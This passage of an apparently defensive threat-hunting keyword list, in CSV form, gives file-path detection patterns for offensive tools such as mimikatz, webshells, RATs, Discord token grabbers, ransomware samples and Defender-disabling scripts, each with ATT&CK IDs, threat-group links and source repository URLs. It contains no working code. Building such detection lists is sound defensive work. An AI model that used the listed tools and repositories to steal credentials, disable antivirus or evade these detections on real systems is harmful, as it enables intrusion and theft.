TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14907" "*\describeTicket.py*",".{0,1000}\\describeTicket\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14908" "*\desktop.ini.smukx*",".{0,1000}\\desktop\.ini\.smukx.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","14909" "*\Desktop\*.dedsec*",".{0,1000}\\Desktop\\.{0,1000}\.dedsec.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","14910" "*\Desktop\FakeText.lnk*",".{0,1000}\\Desktop\\FakeText\.lnk.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","14911" "*\DesktopShell.exe*",".{0,1000}\\DesktopShell\.exe.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","14912" "*\Development\GOLD-BACKDOOR\*",".{0,1000}\\Development\\GOLD\-BACKDOOR\\.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","14913" "*\Device\mimidrv*",".{0,1000}\\Device\\mimidrv.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - 
Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","14914" "*\Device\NamedPipe\NamedPipeMaster*",".{0,1000}\\Device\\NamedPipe\\NamedPipeMaster.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","14915" "*\Devils-Rat *.exe*",".{0,1000}\\Devils\-Rat\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14916" "*\Devils-Rat 8.0.exe*",".{0,1000}\\Devils\-Rat\s8\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14917" "*\devilzShell.asp*",".{0,1000}\\devilzShell\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14918" "*\devilzShell.cgi*",".{0,1000}\\devilzShell\.cgi.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14919" "*\devilzShell.jsp*",".{0,1000}\\devilzShell\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14920" "*\devilzShell.php*",".{0,1000}\\devilzShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14921" "*\DFSCoerce.exe*",".{0,1000}\\DFSCoerce\.exe.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","14923" "*\dfscoerce.py*",".{0,1000}\\dfscoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - 
TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","14924" "*\DGPOEdit.zip*",".{0,1000}\\DGPOEdit\.zip.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","14925" "*\Dialupass.cfg*",".{0,1000}\\Dialupass\.cfg.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. 
You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14926" "*\Diamond RAT Cracked.exe*",".{0,1000}\\Diamond\sRAT\sCracked\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14927" "*\diamorphine.c*",".{0,1000}\\diamorphine\.c.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","14928" "*\diamorphine.h*",".{0,1000}\\diamorphine\.h.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","14929" "*\diavol1.txt*",".{0,1000}\\diavol1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14930" 
"*\diavol2.txt*",".{0,1000}\\diavol2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14931" "*\DigitalOceanProxyTab.java*",".{0,1000}\\DigitalOceanProxyTab\.java.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","14932" "*\DInjector.sln*",".{0,1000}\\DInjector\.sln.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","14933" "*\DInjector\*",".{0,1000}\\DInjector\\.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","14934" "*\dirbuster.py*",".{0,1000}\\dirbuster\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14935" "*\dircreate2system.pdb*",".{0,1000}\\dircreate2system\.pdb.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","14936" "*\dircreate2system.sln*",".{0,1000}dircreate2system\.sln.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","14937" "*\DirCreate2System\bin\*",".{0,1000}\\DirCreate2System\\bin\\.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","14938" "*\dirdevil.ps1*",".{0,1000}\\dirdevil\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","14939" 
"*\dirdevil_decoder_mini.ps1*",".{0,1000}\\dirdevil_decoder_mini\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","14940" "*\dirdevil_decoder_only.ps1*",".{0,1000}\\dirdevil_decoder_only\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","14941" "*\DirtyCLR.sln*",".{0,1000}\\DirtyCLR\.sln.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","14943" "*\DirtyCLR-main*",".{0,1000}\\DirtyCLR\-main.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","14944" "*\DirtyVanity.cpp*",".{0,1000}\\DirtyVanity\.cpp.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","14945" "*\DirtyVanity.sln*",".{0,1000}\\DirtyVanity\.sln.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork 
API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","14946" "*\dis_defender.exe*",".{0,1000}\\dis_defender\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14947" "*\Disable_defender.py*",".{0,1000}\\Disable_defender\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","14949" "*\disableav.bat*",".{0,1000}\\disableav\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","14950" "*\disable-defender.exe*",".{0,1000}\\disable\-defender\.exe.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","14951" "*\disable-defender.rar*",".{0,1000}\\disable\-defender\.rar.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14952" "*\Disable-TamperProtection\*",".{0,1000}\\Disable\-TamperProtection\\.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","14953" "*\DisableWD.7z*",".{0,1000}\\DisableWD\.7z.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","N/A","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","14954" "*\DisableWD.dll,*",".{0,1000}\\DisableWD\.dll,.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - 
TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","14955" "*\Disable-Windows-Defender.pdb*",".{0,1000}\\Disable\-Windows\-Defender\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14956" "*\Discord rat.exe*",".{0,1000}\\Discord\srat\.exe.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","14957" "*\discord-c2\*",".{0,1000}\\discord\-c2\\.{0,1000}","offensive_tool_keyword","discord-c2","C2 communication with discord","T1102.003 - T1071.001 - T1027.010 - T1105 - T1090.002","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bmdyy/discord-c2","1","0","N/A","N/A","10","10","60","6","2022-12-29T03:05:05Z","2022-12-08T19:10:23Z","14958" "*\Discord-RAT-2.0*",".{0,1000}\\Discord\-RAT\-2\.0.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - 
T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","14959" "*\Discord-RAT-2.0-main*",".{0,1000}\\Discord\-RAT\-2\.0\-main.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","14960" "*\DiscordTokenExfilterater.cs*",".{0,1000}\\DiscordTokenExfilterater\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","14961" "*\dist\sigthief.exe*",".{0,1000}\\dist\\sigthief\.exe.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","0","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","14962" "*\DitExplorer.sln*",".{0,1000}\\DitExplorer\.sln.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","14963" "*\Dive Shell 1.0 - Emperor Hacking Team.php*",".{0,1000}\\Dive\sShell\s1\.0\s\-\sEmperor\sHacking\sTeam\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14964" "*\dkmc.py*",".{0,1000}\\dkmc\.py.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","14965" "*\DLHell.py*",".{0,1000}\\DLHell\.py.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","14966" "*\DLHell-main\*",".{0,1000}\\DLHell\-main\\.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","14967" "*\DLL_Hijacking.*",".{0,1000}\\DLL_Hijacking\..{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","14968" "*\dll_inject.exe*",".{0,1000}\\dll_inject\.exe.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","14969" "*\DLLEnc.ps1*",".{0,1000}\\DLLEnc\.ps1.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","14970" "*\Dll-EvtExportLog.cpp*",".{0,1000}\\Dll\-EvtExportLog\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14971" "*\Dll-EvtExportLog.dll*",".{0,1000}\\Dll\-EvtExportLog\.dll.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense 
